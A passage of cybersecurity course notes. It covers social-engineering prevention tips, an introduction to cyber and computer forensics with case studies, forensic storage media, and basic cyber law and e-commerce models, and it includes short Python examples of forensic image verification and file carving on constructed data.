or security questions to an OTP code.

2. Continuously Monitor Critical Systems

Make sure the systems that house sensitive information are monitored 24 x 7. Some
exploitation tactics, such as Trojans, depend on the target system being vulnerable.
Scanning both external and internal systems with web application scanning can help
find vulnerabilities in your systems.

Besides, you should also perform a social engineering engagement at least once a
year to assess whether your employees would fall victim to the dangers of social
engineering. Monitoring also lets you track fake domains impersonating yours, so
that any found can be taken down promptly to avoid copyright infringement online.

3. Utilize Next-Gen cloud-based WAF

You’re probably already employing a firewall within your business, but a
next-generation cloud-based web application firewall is specially designed to ensure
maximum protection against social engineering attacks. A cloud-based WAF is very
different from the traditional WAF that most companies deploy.

To be specific, AppTrana can consistently monitor a web application or website for
anomalous activity and misbehavior. Although social engineering threats depend on
human mistakes, the WAF can block attacks and alert you to any attempted malware
installations. Implementing a risk-based WAF is one of the best ways to prevent social
engineering attacks and any potential infiltration.

4. Verify Email Sender’s Identity

Most scams involve falsely obtaining a victim’s information by pretending to be a
trusted entity. Especially in a phishing attack, attackers send email messages that
appear to come from a sender you trust, such as a credit card company, a bank, a
social networking site, or an online store. The emails often tell a story to make you
click a false link that looks legitimate.

To avoid this kind of social engineering threat, contact the claimed sender of the
email message and confirm whether they sent it or not. Remember, legitimate banks
will not ask for your credentials or confidential information through email.

5. Identify your critical assets which attract criminals

“When a lot of companies focus on protecting their assets, they’re very focused on
that from the perspective of their business” – Jim O’Gorman, a member of
Social-Engineer.org

That is not necessarily how an attacker will approach your company. Attackers
target the assets that are valuable to them.

You should evaluate from the attacker’s perspective and identify what to protect,
considering the assets beyond your product, service, or intellectual property.

“Independent Assessment is the best tool to determine which of your assets criminals
are most likely to target.” – according to O’Gorman.

6. Check for SSL Certificate

Encrypting data, emails, and communication ensures that even if hackers intercept
your communication, they can’t access the information contained within. This can be
achieved by obtaining SSL certificates from trusted authorities.

Furthermore, always verify any site that asks for your sensitive information. To
verify the website’s authenticity, check the URLs. URLs that start with https://
can be considered trusted and encrypted websites, while websites served over
http:// are not offering a secure connection. Note that https:// only proves the
connection is encrypted; attackers can obtain certificates for look-alike domains too,
so check that the domain name itself is the one you expect, not just the padlock.

7. Penetration Testing

The most effective approach among the ways to prevent social engineering attacks is
conducting a pen-test to detect and try to exploit vulnerabilities in your organization.
If your pen-tester succeeds in endangering your critical system, you can identify
which system or employees you need to concentrate on protecting as well as the
types of social engineering attacks you may be prone to.


8. Check and Update your Security Patches

Cybercriminals are generally looking for weaknesses in your application, software,
or systems to attain unauthorized access to your data. As a preventive measure,
always maintain your security patches up to date and keep your web browsers &
systems up to date with the latest versions.

This is because companies release security patches as a response whenever they
uncover security loopholes. Maintaining your systems with the recent release will
not only reduce the possibilities of cyber-attacks but will also ensure a
cyber-resilient environment.

9. Enable Spam Filter

Enable spam filters and close the door on social engineering offenders. Spam filters
offer a vital service in protecting your inboxes from social engineering attacks.

Most email service providers offer spam filters that hold emails which are deemed
suspicious. With spam filtering, you can categorize emails effortlessly and be freed
from the tedious task of identifying suspicious emails yourself.

10. Pay Attention to Your Digital Footprint

Oversharing of personal details online through social media can give these criminals
more information to work with. For instance, if you keep your resume online, you
should consider censoring your date of birth, phone number, and residential address.
All that information is useful for attackers who are planning a social engineering
threat.

Cyber Forensics and Auditing

Introduction to Cyber Forensics

Introduction
Cyber forensics is the process of obtaining data as evidence for a crime (using electronic
equipment) while adhering to correct investigative procedures to apprehend the offender by
presenting the evidence to the court. Computer forensics is another name for cyber forensics.
Maintaining the chain of evidence and documentation to identify the digital criminal is the
primary goal of cyber forensics.

It is crucial to make a digital copy of the system’s storage during the examination. To
identify who is responsible for a security breach, a thorough cyber forensics investigation is
conducted. The full investigation is carried out on that copy, ensuring that the original
system is not impacted.

Cyber forensics is an unavoidable and crucial element in the modern era, thus cyber forensics
plays a huge role in incident response.

Cyber forensics is not only about the technology; it is also about the human in the
loop. Read the case study on the Sony hack, and also refer to the slides, where I
talk about the different practices in DevSecOps that you can use to understand the challenges
in the SDLC, even before we have a compromised system: the challenges, strategies, and the
decision of using the right tool in the SDLC. See the slides.

Cyber forensics is a process of extracting data as proof for a crime (that involves
electronic devices) while following proper investigation rules to nab the culprit by
presenting the evidence to the court. Cyber forensics is also known as computer
forensics. The main aim of cyber forensics is to maintain the thread of evidence and
documentation to find out who did the crime digitally. Cyber forensics can do the
following:
• It can recover deleted files, chat logs, emails, etc.
• It can also recover deleted SMS messages and phone call records.
• It can recover audio recordings of phone conversations.
• It can determine which user used which system and for how long.
• It can identify which user ran which program.

Why is cyber forensics important?

In today’s technology-driven generation, the importance of cyber forensics is immense.
Technology combined with forensic science paves the way for quicker investigations
and accurate results. Below are the points depicting the importance of cyber forensics:
• Cyber forensics helps in collecting important digital evidence to trace the criminal.
• Electronic equipment stores massive amounts of data that a normal person never
sees. For example, in a smart house, every word we speak and every action performed
by a smart device generates data, which can be crucial in cyber forensics.
• It also helps innocent people prove their innocence via the evidence collected online.
• It is not only used to solve digital crimes but also real-world crimes such as theft
and murder.
• Businesses equally benefit from cyber forensics in tracking system breaches and
finding the attackers.
The Process Involved in Cyber Forensics
1. Obtaining a digital copy of the system that is being or is required to be inspected.
2. Authenticating and verifying the reproduction.
3. Recovering deleted files (using Autopsy Tool).
4. Using keywords to find the information you need.
5. Establishing a technical report.

How do cyber forensics experts work?

Cyber forensics is a field that follows certain procedures to find the evidence to reach
conclusions after proper investigation of matters. The procedures that cyber forensic
experts follow are:
• Identification: The first step for cyber forensics experts is to identify what
evidence is present, where it is stored, and in which format it is stored.
• Preservation: After identifying the data, the next step is to safely preserve it
and not allow other people to use that device, so that no one can tamper with the data.
• Analysis: After getting the data, the next step is to analyze the data or system. Here
the expert recovers the deleted files and verifies the recovered data and finds the
evidence that the criminal tried to erase by deleting secret files. This process might
take several iterations to reach the final conclusion.
• Documentation: Now after analyzing data a record is created. This record contains
all the recovered and available(not deleted) data which helps in recreating the crime
scene and reviewing it.
• Presentation: This is the final step in which the analyzed data is presented in front
of the court to solve cases.

Types of computer forensics

There are multiple types of computer forensics depending on the field in which digital
investigation is needed. The fields are:
• Network forensics: This involves monitoring and analyzing the network traffic to
and from the criminal’s network. The tools used here are network intrusion detection
systems and other automated tools.
• Email forensics: In this type of forensics, the experts check the email of the
criminal and recover deleted email threads to extract out crucial information related
to the case.
• Malware forensics: This branch of forensics involves hacking related crimes. Here,
the forensics expert examines the malware, trojans to identify the hacker involved
behind this.
• Memory forensics: This branch of forensics deals with collecting data from
memory (cache, RAM, etc.) in raw form and then retrieving information from that data.
• Mobile Phone forensics: This branch of forensics generally deals with mobile
phones. They examine and analyze data from the mobile phone.
• Database forensics: This branch of forensics examines and analyzes the data from
databases and their related metadata.
• Disk forensics: This branch of forensics extracts data from storage media by
searching modified, active, or deleted files.

Techniques that cyber forensic investigators use

Cyber forensic investigators use various techniques and tools to examine the data and
some of the commonly used techniques are:
• Reverse steganography: Steganography is a method of hiding important data inside
the digital file, image, etc. So, cyber forensic experts do reverse steganography to
analyze the data and find a relation with the case.
• Stochastic forensics: In Stochastic forensics, the experts analyze and reconstruct
digital activity without using digital artifacts. Here, artifacts mean unintended
alterations of data that occur from digital processes.
• Cross-drive analysis: In this process, the information found on multiple computer
drives is correlated and cross-referenced to analyze and preserve information that is
relevant to the investigation.
• Live analysis: In this technique, the suspect’s computer is analyzed from within
the running OS. It targets the volatile data in RAM to obtain valuable
information.
• Deleted file recovery: This includes searching for memory to find fragments of a
partially deleted file in order to recover it for evidence purposes.
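
The five-step process listed earlier (image, verify the copy, recover deleted files, keyword search, report) and the deleted-file-recovery technique above can be shown end to end on a tiny scale. The script below is an added example, not part of the original notes: it constructs a miniature "disk image" in memory, verifies a working copy by SHA-256, searches it for a keyword, and carves a deleted PNG out of unallocated space by walking its chunk structure and checking each chunk's CRC. The image contents, the keyword and the choice of SHA-256 are assumptions.

```python
"""
Added example, not part of the original notes: image verification, keyword
search and signature-based carving on a constructed miniature disk image.
Uses only Python's standard hashlib, struct and zlib modules.
"""
import hashlib
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def build_constructed_image():
    """Construct a tiny 'disk image': some allocated text followed by free
    space that still holds a deleted 1x1 PNG whose directory entry is gone."""
    def chunk(kind, data):
        body = kind + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body))

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1 pixel, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")              # filter byte + one red pixel
    png = PNG_MAGIC + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    allocated = b"README.TXT  payroll 2024 confidential\x00" * 4
    unallocated = b"\x00" * 37 + png + b"\x00" * 50
    return allocated + unallocated


def sha256_hex(data):
    """Hash recorded in the chain-of-custody notes for the original and the copy."""
    return hashlib.sha256(data).hexdigest()


def verify_copy(original, copy):
    """Step 2 of the process: the working copy must hash identically to the source."""
    return sha256_hex(original) == sha256_hex(copy)


def keyword_search(image, keyword):
    """Step 4: byte offsets of an ASCII keyword (case-insensitive), including
    hits in unallocated space that no file listing would show."""
    needle = keyword.encode().lower()
    haystack = image.lower()
    hits, start = [], 0
    while (i := haystack.find(needle, start)) != -1:
        hits.append(i)
        start = i + 1
    return hits


def carve_png(image):
    """Deleted file recovery: locate PNG signatures and walk the chunk list to
    IEND, verifying each chunk CRC so a corrupt fragment is not reported as a
    recovered file. Returns (offset, bytes) pairs."""
    carved, start = [], 0
    while (i := image.find(PNG_MAGIC, start)) != -1:
        pos, end = i + len(PNG_MAGIC), None
        while pos + 12 <= len(image):                 # 8-byte header + 4-byte CRC
            length = struct.unpack(">I", image[pos:pos + 4])[0]
            kind = image[pos + 4:pos + 8]
            body_end = pos + 8 + length
            if body_end + 4 > len(image):
                break                                 # runs off the end: truncated
            crc = struct.unpack(">I", image[body_end:body_end + 4])[0]
            if crc != zlib.crc32(image[pos + 4:body_end]):
                break                                 # corrupt chunk: stop trusting it
            pos = body_end + 4
            if kind == b"IEND":
                end = pos
                break
        if end is not None:
            carved.append((i, image[i:end]))
        start = i + 1
    return carved


if __name__ == "__main__":
    source = build_constructed_image()
    working_copy = bytes(source)                       # stands in for the acquired image
    print("copy verified:", verify_copy(source, working_copy), sha256_hex(source))
    print("keyword offsets:", keyword_search(working_copy, "payroll"))
    for offset, data in carve_png(working_copy):
        print(f"carved PNG at offset {offset}, {len(data)} bytes")
```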

Advantages

• Cyber forensics ensures the integrity of the computer.
• Through cyber forensics, many people, companies, etc get to know about such
crimes, thus taking proper measures to avoid them.
• Cyber forensics find evidence from digital devices and then present them in court,
which can lead to the punishment of the culprit.
• They efficiently track down the culprit anywhere in the world.
• They help people or organizations to protect their money and time.
• Relevant cases can be publicized and used to make the public aware of such crimes.

What are the required set of skills needed to be a cyber forensic expert?

The following skills are required to be a cyber forensic expert:
• As we know, cyber forensics is based on technology. So, knowledge of various
technologies, computers, mobile phones, network hacks, security breaches, etc. is
required.
• The expert should be very attentive while examining a large amount of data to
identify proof/evidence.
• The expert must be aware of criminal laws, a criminal investigation, etc.
• As we know, over time technology always changes, so the experts must be updated
with the latest technology.
• Cyber forensic experts must be able to analyse the data, derive conclusions from it
and make proper interpretations.
• The communication skill of the expert must be good so that while presenting
evidence in front of the court, everyone understands each detail with clarity.
• The expert must have strong knowledge of basic cyber security.

Computer equipment and associated storage media

Digital forensics is the process that deals with the recovery and investigation of data that is
stored on digital devices. It also pertains to the hardware and software tools that experts use to
retrieve the data without loss. In this lesson, we will discuss data storage devices, what these
devices are, how they are used, and the benefits of each separately in digital forensics.

Data Forensics Introduction

Forensic technologies are designed to prepare and extract evidence from computer systems. Any
devices that store data (e.g. computers, laptops, smartphones, memory cards or external hard
drives) are within the ambit of digital forensics. The forensics process is outlined as follows:

1. Identification
2. Preservation
3. Collection
4. Examination
5. Analysis
6. Presentation

The two basic types of data that are collected in computer forensics are persistent data, or data
stored on a local hard drive (or another device) which is preserved when the computer is turned
off, and volatile data, or data that is stored in memory and lost when the computer loses power.
To handle this data, forensics relies on experts in operating and file systems, data recovery,
cloud computing, and more. They analyze hard disks or hard-disk images from a variety of
different operating systems and provide an interface so that files can be analyzed and
information gathered in electronic format is easy to extract and store.

Forensics & Storage Devices

There are many devices that store data in the world today. Some are old and antiquated, but nonetheless still
store data and may need to have recovery methods performed on them. The most popular are outlined below.

Solid State Disks (SSD)
Solid State Disks (SSDs) store data with the use of flash-memory chips (called NAND flash memory). There
are no moving parts to break and data is stored electronically, not magnetically. The advantages of SSDs are
their size, weight, and lower power usage than hard disks. They come in many different shapes depending on chip
count and how those chips are arranged. They are more expensive, but are faster in reading and writing data.
One drawback is that there are no warning signs if a total drive failure is about to occur. They are a suitable
replacement for hard drives in desktop and laptop computers. Traditional forensic methods fail when
attempting to recover information deleted from SSDs, largely because the drive’s own TRIM and
wear-levelling logic erases or relocates freed blocks, so new methods have been developed.

Magnetic Media
Magnetic media store data on a magnetized medium. There are three types of storage devices in this area:

• Floppy disks: These devices contain soft magnetic disks used for data transfer, storage and backup of
small amounts of data. An important disadvantage is that they can be affected by heat, dust and
magnetic fields. Floppy disks have been largely replaced by flash memory, optical disks, and external
hard drives.
• Hard drives: These devices contain hard magnetic platters which store and retrieve digital
information. They are more accessible and affordable than SSDs and offer the largest capacity. One
drawback is that they consume more power and produce more noise while in operation than SSDs.
Because of movable, mechanical parts, a hard drive is vulnerable to damage when shaken or
dropped. Data resides on these disks even after the power supply is turned off. Information from hard
drives may be recoverable using data carving techniques or by using a commercial data recovery
tool. Another forensic recovery method is to clone a hard drive to an image file. This is more practical
but depends on the size of the source hard drive and the equipment that is used.
• Magnetic tapes: These devices are similar to an audio cassette tape. They are well-suited for
archiving because of their high capacity, low cost and long durability. Compared to a hard disk, these
are very slow. You can only get to data by winding through the tape. Data is downloaded to magnetic
tapes mostly for long-term storage. Because data is stored magnetically, care must be taken to keep
tapes away from all types of magnetic fields. They differ in the way that data is retrieved because they
must be read in a linear fashion, from the start of the tape through the end of the tape. This drastically
increases the time it takes to make a forensic recovery.

Digital Audio Tapes

Digital audio tapes are magnetic tape cassettes that store audio information in digital manner. Low cost and
compact size are some clear benefits. These can only be recorded and played back in one direction, however.
Many of these types of tapes and their hardware are no longer being manufactured by major companies,
creating forensic recovery issues.

Digital Linear Tapes

Digital Linear Tapes (DLT) are a good replacement for digital audio tapes. They use a special algorithm that
facilitates retrieval and storage of data at high speeds. These tapes can store up to 35 GB per cassette by using
'longitudinal recording' techniques. A main use of these tapes is to back up servers in a data center, and they can be
easily recovered for forensic purposes.

What is computer forensics?
Computer forensics is the application of investigation and analysis techniques to
gather and preserve evidence from a particular computing device in a way that is
suitable for presentation in a court of law. The goal of computer forensics is to
perform a structured investigation and maintain a documented chain of evidence to
find out exactly what happened on a computing device and who was responsible for it.

Computer forensics -- which is sometimes referred to as computer forensic science --
essentially is data recovery with legal compliance guidelines to make the information
admissible in legal proceedings. The terms digital forensics and cyber forensics are
often used as synonyms for computer forensics.

Digital forensics starts with the collection of information in a way that maintains its
integrity. Investigators then analyze the data or system to determine if it was changed,
how it was changed and who made the changes. The use of computer forensics isn't
always tied to a crime. The forensic process is also used as part of data recovery
processes to gather data from a crashed server, failed drive, reformatted operating
system (OS) or other situation where a system has unexpectedly stopped working.

Why is computer forensics important?

In the civil and criminal justice system, computer forensics helps ensure the integrity
of digital evidence presented in court cases. As computers and other data-collecting
devices are used more frequently in every aspect of life, digital evidence -- and the
forensic process used to collect, preserve and investigate it -- has become more
important in solving crimes and other legal issues.

The average person never sees much of the information modern devices collect. For
instance, the computers in cars continually collect information on when a driver
brakes, shifts and changes speed without the driver being aware. However, this
information can prove critical in solving a legal matter or a crime, and computer
forensics often plays a role in identifying and preserving that information.

Digital evidence isn't just useful in solving digital-world crimes, such as data theft,
network breaches and illicit online transactions. It's also used to solve physical-world
crimes, such as burglary, assault, hit-and-run accidents and murder.

Businesses often use a multilayered data management, data governance and network
security strategy to keep proprietary information secure. Having data that's well
managed and safe can help streamline the forensic process should that data ever come
under investigation.

Businesses also use computer forensics to track information related to a
system or network compromise, which can be used to identify and prosecute
cyber attackers. Businesses can also use digital forensic experts and processes
to help them with data recovery in the event of a system or network failure
caused by a natural or other disaster.

As the world becomes more reliant on digital technology for the core
functions of life, cybercrime is rising. As such, computer forensic specialists
no longer have a monopoly on the field. See how the police in the U.K. are
adopting computer forensic techniques to keep up with increasing rates of
cybercrime.

Types of computer forensics

There are various types of computer forensic examinations. Each deals with a
specific aspect of information technology. Some of the main types include
the following:

• Database forensics. The examination of information contained in
databases, both data and related metadata.
• Email forensics. The recovery and analysis of emails and other
information contained in email platforms, such as schedules and contacts.
• Malware forensics. Sifting through code to identify possible malicious
programs and analyzing their payload. Such programs may include Trojan
horses, ransomware or various viruses.
• Memory forensics. Collecting information stored in a computer's random access
memory (RAM) and cache.
• Mobile forensics. The examination of mobile devices to retrieve and analyze the
information they contain, including contacts, incoming and outgoing text
messages, pictures and video files.
• Network forensics. Looking for evidence by monitoring network traffic, using tools
such as a firewall or intrusion detection system.

How does computer forensics work?

Forensic investigators typically follow standard procedures, which vary depending on
the context of the forensic investigation, the device being investigated or the
information investigators are looking for. In general, these procedures include the
following three steps:

1. Data collection. Electronically stored information must be collected in a way that
maintains its integrity. This often involves physically isolating the device under
investigation to ensure it cannot be accidentally contaminated or tampered with.
Examiners make a digital copy, also called a forensic image, of the device's
storage media, and then they lock the original device in a safe or other secure
facility to maintain its pristine condition. The investigation is conducted on the
digital copy. In other cases, publicly available information may be used for
forensic purposes, such as Facebook posts or public Venmo charges for purchasing
illegal products or services displayed on the Vicemo website.

2. Analysis. Investigators analyze digital copies of storage media in a sterile
environment to gather the information for a case. Various tools are used to assist in
this process, including Basis Technology's Autopsy for hard drive investigations
and the Wireshark network protocol analyzer. A mouse jiggler is useful when
examining a running computer: it keeps the machine from going to sleep, which
would lose the volatile memory data that disappears when the computer sleeps or
loses power.

3. Presentation. The forensic investigators present their findings in a legal proceeding,
where a judge or jury uses them to help determine the result of a lawsuit. In a data
recovery situation, forensic investigators present what they were able to recover
from a compromised system.
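
The integrity requirement in the data collection step above is enforced by hashing: the examiner hashes the source media as it is imaged, re-hashes the finished image independently, and records both digests in the custody log so the working copy can be re-verified at any later point. The following Python script is an added example for these notes, not code from the original source or from any forensic tool; the media contents, examiner name and case identifier are constructed sample values, and a BytesIO stream stands in for a raw device so that it runs offline.

```python
import hashlib
import io
from datetime import datetime, timezone

CHUNK = 4096  # read the media in fixed-size blocks, as an imaging tool reads sectors


def hash_stream(stream):
    """SHA-256 of everything readable from `stream`, from its current position."""
    h = hashlib.sha256()
    for chunk in iter(lambda: stream.read(CHUNK), b""):
        h.update(chunk)
    return h.hexdigest()


def acquire_image(source, dest, examiner, case_id):
    """Copy the original media (`source`) block by block into `dest`, hashing the
    bytes as they are read. The finished image is then re-read and hashed on its
    own so the copy is proven bit-identical before the original is sealed away.
    Returns the chain-of-custody record that accompanies the image."""
    src_hash = hashlib.sha256()
    size = 0
    for chunk in iter(lambda: source.read(CHUNK), b""):
        src_hash.update(chunk)
        dest.write(chunk)
        size += len(chunk)
    dest.seek(0)
    image_digest = hash_stream(dest)
    return {
        "case": case_id,
        "examiner": examiner,
        "acquired_utc": datetime.now(timezone.utc).isoformat(),
        "bytes": size,
        "sha256_source": src_hash.hexdigest(),
        "sha256_image": image_digest,
        # an image whose digest differs from the source must not be analysed
        "verified": src_hash.hexdigest() == image_digest,
    }


def verify_image(stream, record):
    """Re-verification before analysis or presentation: the working copy must
    still hash to the value recorded at acquisition."""
    stream.seek(0)
    return hash_stream(stream) == record["sha256_image"]


# Constructed sample media (not real evidence): ~12 KB of "disk" with one readable file.
SAMPLE_MEDIA = b"\x00" * 4000 + b"memo.txt: quarterly figures, do not distribute" + b"\xff" * 8000


def run_demo():
    """Acquire the sample media, verify the image, then show that a single
    changed byte in the working copy is caught on re-verification."""
    original = io.BytesIO(SAMPLE_MEDIA)
    image = io.BytesIO()
    record = acquire_image(original, image, "examiner-01 (constructed)", "CASE-0001 (constructed)")
    intact_ok = verify_image(image, record)

    tampered = io.BytesIO(image.getvalue())
    tampered.seek(4000)
    tampered.write(b"M")  # overwrite the first byte of the memo in the copy
    tampered_ok = verify_image(tampered, record)
    return record, intact_ok, tampered_ok


if __name__ == "__main__":
    rec, ok, bad = run_demo()
    print("acquired %d bytes, sha256 %s, verified=%s" % (rec["bytes"], rec["sha256_image"], rec["verified"]))
    print("re-verification of intact copy:", ok)
    print("re-verification of tampered copy:", bad)
```

With a real device the source would be the block device opened read-only (behind a hardware write blocker) and the record would be stored alongside the image; the point is that acquire_image only marks an image as verified when the two independently computed digests agree, and verify_image repeats that check before any analysis.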

Often, multiple tools are used in computer forensic investigations to validate the
results they produce. Learn how a researcher at Kaspersky Lab in Asia created an
open source forensics tool for remotely collecting malware evidence without
compromising system integrity.

Techniques forensic investigators use

Investigators use a variety of techniques and proprietary forensic applications to
examine the copy they've made of a compromised device. They search hidden folders
and unallocated disk space for copies of deleted, encrypted or damaged files. Any
evidence found on the digital copy is carefully documented in a findings report and
verified with the original device in preparation for legal proceedings that involve
discovery, depositions or actual litigation.

Computer forensic investigations use a combination of techniques and expert
knowledge. Some common techniques include the following:

• Reverse steganography. Steganography is a common tactic used to hide data inside
any type of digital file, message or data stream. Computer forensic experts reverse
a steganography attempt by analyzing the hash of the file in question. If a
cybercriminal hides information inside an image or other digital file, it may look the
same before and after to the untrained eye, but the underlying hash or string of data
that represents the image will change.

• Stochastic forensics. Here, investigators analyze and reconstruct digital activity
without the use of digital artifacts. Artifacts are unintended alterations of data that
occur from digital processes. Artifacts include clues related to a digital crime, such
as changes to file attributes during data theft. Stochastic forensics is frequently
used in data breach investigations where the attacker is thought to be an insider,
who might not leave behind digital artifacts.

• Cross-drive analysis. This technique correlates and cross-references information
found on multiple computer drives to search for, analyze and preserve information
relevant to an investigation. Events that raise suspicion are compared with
information on other drives to look for similarities and provide context. This is
also known as anomaly detection.

• Live analysis. With this technique, a computer is analyzed from within the OS
while the computer or device is running, using system tools on the computer. The
analysis looks at volatile data, which is often stored in cache or RAM. Many tools
used to extract volatile data require the computer to be in a forensic lab to
maintain the legitimacy of the chain of evidence.

• Deleted file recovery. This technique involves searching a computer system and
memory for fragments of files that were partially deleted in one place but leave
traces elsewhere on the machine. This is sometimes known as file carving or data
carving.
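
File carving, as described in the last item, works by scanning unallocated space for the byte patterns that open and close known file types and cutting out everything between them, without relying on file system metadata that deletion has already discarded. The following Python carver is an added example for these notes, not code from the page or from any of the tools named above; its signature table covers only JPEG and PNG, and the unallocated-space sample (including a JPEG whose tail has been overwritten) is constructed in the script.

```python
import hashlib

# Header / footer signatures for the types carved here (constructed subset; real
# carvers such as Autopsy ship far larger signature tables).
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
}
MAX_CARVE = 1 << 20  # give up looking for a footer after 1 MiB and report a fragment


def carve(blob):
    """Scan unallocated space (`blob`) for known headers and cut out each file up
    to its footer. Files whose footer is missing (partially overwritten) are still
    reported, flagged as incomplete, because the surviving fragment is evidence."""
    found = []
    for kind, (header, footer) in SIGNATURES.items():
        pos = 0
        while True:
            start = blob.find(header, pos)
            if start == -1:
                break
            end = blob.find(footer, start + len(header), start + MAX_CARVE)
            if end == -1:
                data = blob[start:start + MAX_CARVE]
                complete = False
                pos = start + len(header)  # another header may follow inside the fragment
            else:
                data = blob[start:end + len(footer)]
                complete = True
                pos = start + len(data)
            found.append({
                "type": kind,
                "offset": start,
                "size": len(data),
                "complete": complete,
                # every recovered item is hashed so the report can be tied to the image
                "sha256": hashlib.sha256(data).hexdigest(),
                "data": data,
            })
    return sorted(found, key=lambda f: f["offset"])


# Constructed unallocated-space sample: a complete JPEG, a complete PNG, and a JPEG
# whose tail was overwritten, separated by zeroed sectors.
SAMPLE_UNALLOCATED = (
    b"\x00" * 512
    + b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"A" * 100 + b"\xff\xd9"
    + b"\x00" * 200
    + b"\x89PNG\r\n\x1a\n" + b"B" * 60 + b"\x00\x00\x00\x00IEND\xaeB`\x82"
    + b"\x00" * 100
    + b"\xff\xd8\xff\xe1" + b"C" * 40
)


if __name__ == "__main__":
    for item in carve(SAMPLE_UNALLOCATED):
        print("%-4s offset=%5d size=%4d complete=%s sha256=%s..." % (
            item["type"], item["offset"], item["size"], item["complete"], item["sha256"][:16]))
```

Header-to-footer carving is the simplest form; it misses fragmented files and can be fooled by a footer pattern that happens to occur inside file data, which is why the carved items are hashed and reported with their offsets so they can be validated by a second tool, as the notes recommend.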

Find out more about computer forensic analytics in this chapter from the book Python
Forensics: A Workbench for Inventing and Sharing Digital Forensic Technology, by
Chet Hosmer. It shows how to use Python and cybersecurity technology to preserve
digital evidence.

How is computer forensics used as evidence?

Computer forensics has been used as evidence by law enforcement agencies and in
criminal and civil law since the 1980s. Some notable cases include the following:

• Apple trade secret theft. An engineer named Xiaolang Zhang at Apple's
autonomous car division announced his retirement and said he would be moving
back to China to take care of his elderly mother. He told his manager he planned to
work at an electronic car manufacturer in China, raising suspicion. According to a
Federal Bureau of Investigation (FBI) affidavit, Apple's security team reviewed
Zhang's activity on the company network and found, in the days prior to his
resignation, he downloaded trade secrets from confidential company databases to
which he had access. He was indicted by the FBI in 2018.

• Enron. In one of the most commonly cited accounting fraud scandals, Enron, a
U.S. energy, commodities and services company, falsely reported billions of
dollars in revenue before going bankrupt in 2001, causing financial harm to many
employees and other people who had invested in the company. Computer forensic
analysts examined terabytes of data to understand the complex fraud scheme. The
scandal was a significant factor in the passing of the Sarbanes-Oxley Act of 2002,
which set new accounting compliance requirements for public companies.

• Google trade secret theft. Anthony Scott Levandowski, a former executive of both
Uber and Google, was charged with 33 counts of trade secret theft in 2019. From
2009 to 2016, Levandowski worked in Google's self-driving car program, where
he downloaded thousands of files related to the program from a password-protected
corporate server. He departed from Google and created Otto, a self-driving truck
company, which Uber bought in 2016, according to The New York Times.
Levandowski pleaded guilty to one count of trade secret theft and was sentenced to
18 months in prison and $851,499 in fines and restitution. Levandowski received a
presidential pardon in January 2021.

• Larry Thomas. Thomas shot and killed Rito Llamas-Juarez in 2016. Thomas was
later convicted with the help of hundreds of Facebook posts he made under the
fake name of Slaughtaboi Larro. One of the posts included a picture of him
wearing a bracelet that was found at the crime scene.

• Michael Jackson. Investigators used metadata and medical documents from
Michael Jackson's doctor's iPhone that showed the doctor, Conrad Murray,
prescribed lethal amounts of medication to Jackson, who died in 2009.

• Mikayla Munn. Munn drowned her newborn baby in the bathtub of her Manchester
University dorm room in 2016. Investigators found Google searches on her
computer containing the phrase "at home abortion," which were used to convict
her.

Murder is just one of the many types of crime computer forensics can aid in
combating. Learn how forensic financial analysis software is used to combat fraud.

Cyber Ethics and Laws

Introduction to Cyber Laws

Cyber law, also known as Internet law, is the part of the overall legal
system that is related to legal informatics and supervises the digital circulation of
information, e-commerce, software and information security. It is associated with legal
informatics and electronic elements, including information systems, computers, software, and
hardware. It covers many areas, such as access to and usage of the Internet, encompassing
various subtopics such as freedom of expression and online privacy.

Cyber laws help to reduce or prevent cybercriminal activity on a large scale by protecting
information from unauthorized access and by governing freedom of speech related to the use
of the Internet, privacy, communications, email, websites, intellectual property, and hardware
and software such as data storage devices. As Internet traffic increases rapidly day by day, it
has led to a higher percentage of legal issues worldwide. Because cyber laws differ by
country and jurisdiction, punishment ranges from fines to imprisonment, and enforcement is
challenging.

Cyber law offers legal protection to people who use the Internet as well as to those running
an online business. It is most important for Internet users to know the local cyber law of
their country, so that they know which activities are legal on the network and which are not,
and can keep themselves away from unauthorized activities.

The Computer Fraud and Abuse Act (CFAA), enacted in 1986, was the first cyber law. It was
helpful in preventing unauthorized access to computers, and it also described the stages of
punishment for breaking the law or performing any illegal activity.

Cyber law, also called IT law, is the law regarding information technology, including
computers and the internet. It is related to legal informatics and supervises the digital
circulation of information, software, information security, and e-commerce.

IT law does not constitute a separate area of law; rather, it encloses aspects of contract,
intellectual property, privacy, and data protection law. Intellectual property is a key element
of IT law. The area of software licensing is controversial and still evolving in Europe and
elsewhere.

E-commerce

E-commerce (Electronic Commerce) is the buying and selling of goods and services, or the
transmitting of funds or data, over the internet.

E-commerce is a methodology of modern business which addresses the need of business
organizations, vendors and customers to reduce cost and improve the quality of goods and
services while increasing the speed of delivery.

E-commerce refers to paperless exchange of business information using EDI, E-mail, electronic
fund transfer etc.

E-commerce web sites are like on-line market places where you can sell and buy items, and
facilitate it by advertising your product, establishing newsgroups and blogs, posting job-oriented
resumes etc.

Types of E-commerce models:

There are four main types of e-commerce models that can describe almost every transaction that
takes place between consumers and businesses.

1. Business-to-Consumer (B2C)

The B2C model involves a transaction between a business organization and a customer. The business
organization sells its products directly to a consumer. The customer can view the products shown on
the website, choose a product and order it. The website will then send a notification to the
business organization via email, and the organization will dispatch the product/goods to the customer.

2. Business-to-Business (B2B)

The B2B model involves a transaction between companies/businesses, such as between a
manufacturer and a wholesaler or between a wholesaler and a retailer. The business/company sells
its products to an intermediate buyer who then sells the product to the final customer.

3. Consumer-to-Business (C2B)

The C2B model involves a transaction between a consumer and a business organization. It is
similar to the B2C model; the difference is that in this case the consumer is the seller and the
business organization is the buyer. In this kind of transaction, the consumer decides the price of a
particular product, which the business accepts or declines.

4. Consumer-to-Consumer (C2C)

The C2C model involves a transaction between consumers. Here, a consumer sells directly to
another consumer. A well-known example is eBay.

E-governance

E-governance is the application of information and communication technology (ICT) for
delivering government services, exchanging information and communication transactions,
and integrating various stand-alone systems and services between government-to-customer (G2C),
